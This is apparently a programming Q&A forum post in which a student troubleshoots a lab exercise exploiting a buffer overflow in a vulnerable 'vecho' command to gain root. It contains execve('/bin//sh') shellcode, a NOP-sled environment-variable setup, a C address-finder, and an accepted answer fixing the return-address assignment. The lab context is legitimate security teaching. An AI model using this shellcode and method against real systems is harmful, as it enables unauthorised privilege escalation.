# buffer overflow exploit using vecho

Tags: linux, buffer, buffer-overflow

I am doing a lab that requires us to execute a buffer overflow to gain root privileges using a built in vulnerable command called vecho (functions the same as echo). However no matter what I try I cannot get it to work.

```
    .section .text
 .globl _start
_start:
     xor  %eax, %eax    // your comments go here
     push %eax       // and here, and so on...
     push $0x68732f2f
     push $0x6e69622f
     mov  %esp, %ebx
     push %eax
  mov  %esp, %ecx
  push %ebx
  mov  %eax, %edx
  mov  $0xb, %al
  int  $0x80
```

We load this into an environment variable saved as egg by doing

```
export EGG=$(<shellcode.bin)
```

We then make a sled

```
SLED=`python -c "print '\x90' * 100"`
```

And add the sled to the variable

```
export EGG=$SLED$EGG
```

We then find the address that EGG will be at when we run vecho using this

```
#include<stdio.h>
   #include<stdlib.h>
   #include<string.h>
   int main(int argc, char** argv){
       char *ptr;
       if(argc < 3){
           printf("Usage:%s<environmentvar><targetprogramname>\n", 
             argv[0]);
           exit(0);
    }
    ptr = getenv(argv[1]);
    ptr += (strlen(argv[0]) - strlen(argv[2]))*2;
    printf("%s will be at %p\n", argv[1], ptr);
}
```

We then create an address variable in little endian form by doing something like this

```
ADDRESS=echo -en "\xff\xff\xff\xbf"
```

And a padding variable that is characters enough to push address into the eip and then run

```
vecho $PADDING$ADDRESS
```

But no matter what I try I get either a successful print if the padding is too small, seg fault if the padding is too long and Illegal instruction right in the middle. I feel like this illegal instruction spot is important but i cant get it to actually run the shell code.

Answer (score 0, accepted):

You've almost got it. The instruction is illegal because it looks like you're assigning echo -en "\xff\xff\xff\xbf" to ADDRESS. What you want to do is:

```
ADDRESS=`echo -en "\xff\xff\xff\xbf"`
```

That will assign the result to ADDRESS as opposed to the entire command.